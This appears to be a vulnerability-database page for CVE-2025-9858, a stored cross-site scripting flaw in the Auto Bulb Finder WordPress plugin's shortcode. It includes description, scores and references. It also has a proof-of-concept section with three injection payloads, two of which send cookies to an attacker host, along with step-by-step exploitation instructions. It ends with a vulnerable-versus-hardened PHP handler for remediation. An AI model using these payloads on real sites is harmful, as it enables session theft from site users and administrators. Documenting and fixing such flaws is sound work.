Security Vulnerability Report
CVE-2025-9858 CVSS 6.4 MEDIUM

CVE-2025-9858

Published: 2025-10-03 12:15:49
Last Modified: 2026-04-15 00:35:42

Description

The Auto Bulb Finder for WordPress plugin is vulnerable to stored cross-site scripting (CWE-79) via its 'abf_vehicle' shortcode in all versions up to, and including, 2.8.0, because user-supplied shortcode attributes are neither sanitized on input nor escaped on output. An authenticated attacker with Contributor-level access or higher can therefore store arbitrary web script in a post or page; the script executes in the browser of any user who views the injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data has been published for this CVE; the affected range below is taken from the description.

Auto Bulb Finder for WordPress <= 2.8.0 (no fixed version is given on this page)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-9858 PoC: Stored XSS via the abf_vehicle shortcode -->
<!-- Insert one of the shortcodes below into a post or page as a Contributor-level (or higher) user. -->
<!-- All payloads assume the plugin echoes the 'model' attribute, unescaped, inside a double-quoted
     HTML attribute. The exact markup rendered by custom-block.php is not reproduced on this page,
     so adjust the quoting to match whatever the vulnerable line actually emits. -->

<!-- PoC 1: attribute breakout with an event handler (fires on hover).
     The leading " closes the original attribute; the trailing data-x=" absorbs the
     plugin's own closing quote so the markup stays well-formed. -->
[abf_vehicle model='" onmouseover="alert(document.cookie)" data-x="' year="2020"]

<!-- PoC 2: raw <script> inside the attribute. This only works for users with the unfiltered_html
     capability (Administrators, and Editors on single-site installs): for a Contributor, KSES strips
     the <script> tag from the post on save, so this variant does NOT reproduce the contributor-level
     issue the advisory describes. -->
[abf_vehicle model="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>" year="2020"]

<!-- PoC 3: no user interaction needed (autofocus + onfocus). The URL is a JavaScript template
     literal (backticks): a double quote would close the injected HTML attribute, a single quote
     would terminate the single-quoted shortcode attribute, and shortcode_parse_atts() does not
     honour backslash escapes, so \' cannot be used here. -->
[abf_vehicle model='" onfocus="fetch(`https://attacker.com/log?data=`+document.cookie)" autofocus="' year="2020"]

<!-- Exploitation steps:
     1. Log in to WordPress as a Contributor or higher.
     2. Create a new post or page.
     3. Add the shortcode to the content. A shortcode is plain text to KSES, so the attribute
        breakout in PoC 1 and PoC 3 survives the save even without unfiltered_html.
     4. Submit the post for review, or publish it if the role allows.
     5. When any user (including an administrator previewing the pending post) views the page,
        the shortcode is rendered and the JavaScript executes in that user's browser.
     6. The attacker's listener receives the cookie, or the script acts as the victim.
        Caveat: WordPress sets its authentication cookies with the HttpOnly flag, so document.cookie
        will not expose them; a realistic payload instead issues same-origin requests (admin-ajax.php,
        the REST API) that ride on the victim's existing session. -->
<!-- Vulnerable code reference: auto-bulb-finder-for-wp-wc/tags/2.8.0/includes/blocks/custom-block.php, line 45 -->
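As an added illustration (not the plugin's code, which this page does not reproduce), the pattern the advisory describes and its remediation: a hypothetical abf_vehicle shortcode handler that echoes attributes straight into markup, beside a hardened handler that allowlists attributes with shortcode_atts(), sanitizes on input and escapes for the exact output context. The function names and the rendered markup are assumptions; the WordPress functions used (shortcode_atts, sanitize_text_field, absint, esc_attr, esc_html, add_shortcode) are the real core APIs.

```php
<?php
/**
 * Added example, not the plugin's code: vulnerable vs. hardened shortcode handler.
 * Function names and markup are hypothetical; the real handler in
 * includes/blocks/custom-block.php is not reproduced on this page.
 */

// VULNERABLE PATTERN: attribute values from shortcode_parse_atts() land in the
// markup untouched. A Contributor cannot store <script> (KSES strips it), but a
// shortcode attribute is plain text to KSES, so a value such as
//   " onfocus="fetch(...)" autofocus="
// is saved as-is and breaks out of value="..." when the shortcode is rendered.
function abf_vehicle_shortcode_vulnerable( $atts ) {
    $atts = shortcode_atts( array( 'model' => '', 'year' => '' ), $atts, 'abf_vehicle' );
    return '<div class="abf-vehicle">'
        . '<input type="text" name="model" value="' . $atts['model'] . '">'
        . '<span class="abf-year">' . $atts['year'] . '</span>'
        . '</div>';
}

// HARDENED PATTERN: allowlist the attribute set, sanitize on input, escape on output.
function abf_vehicle_shortcode_hardened( $atts ) {
    // shortcode_atts() drops attributes that are not in the allowlist. That limits the
    // surface, but it does nothing to the *contents* of an allowed attribute, so it is
    // not a fix on its own.
    $atts = shortcode_atts(
        array( 'model' => '', 'year' => '' ),
        $atts,
        'abf_vehicle'
    );

    // Input sanitization: strip tags, octets and line breaks from free text; coerce the
    // year to a non-negative integer and reject implausible values (constructed range).
    $model = sanitize_text_field( $atts['model'] );
    $year  = absint( $atts['year'] );
    if ( $year < 1900 || $year > (int) gmdate( 'Y' ) + 1 ) {
        $year = 0;
    }

    // Output escaping per context. sanitize_text_field() leaves quotes alone, so the
    // attribute-breakout payload survives it; esc_attr() (encodes & < > " ') inside the
    // attribute is what actually neutralises it. esc_html() covers the text node.
    return '<div class="abf-vehicle">'
        . '<input type="text" name="model" value="' . esc_attr( $model ) . '">'
        . '<span class="abf-year">' . esc_html( $year ? (string) $year : '' ) . '</span>'
        . '</div>';
}

// Register only the hardened handler; the vulnerable one is kept above for contrast.
add_shortcode( 'abf_vehicle', 'abf_vehicle_shortcode_hardened' );
```

To check a fix, render the PoC shortcode through do_shortcode() (for example with `wp eval "echo do_shortcode('[abf_vehicle model=\"x\\\" onfocus=\\\"alert(1)\" year=\"2020\"]');"`) and confirm the quote in the model value comes back as `&quot;` inside value="..." rather than terminating the attribute.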

References

https://plugins.trac.wordpress.org/browser/auto-bulb-finder-for-wp-wc/tags/2.8.0/includes/blocks/custom-block.php#L45 (Wordfence: vulnerable code reference, custom-block.php line 45 in the 2.8.0 tag)
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3414958%40auto-bulb-finder-for-wp-wc&new=3414958%40auto-bulb-finder-for-wp-wc&sfp_email=&sfph_mail= (Wordfence: plugin repository changeset)
https://www.wordfence.com/threat-intel/vulnerabilities/id/c141af66-ebf6-4a80-8dfd-47a586342676?source=cve (Wordfence Threat Intelligence advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-9858",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-03T12:15:49.093",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Auto Bulb Finder for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'abf_vehicle' shortcode in all versions up to, and including, 2.8.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/auto-bulb-finder-for-wp-wc/tags/2.8.0/includes/blocks/custom-block.php#L45",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3414958%40auto-bulb-finder-for-wp-wc&new=3414958%40auto-bulb-finder-for-wp-wc&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c141af66-ebf6-4a80-8dfd-47a586342676?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}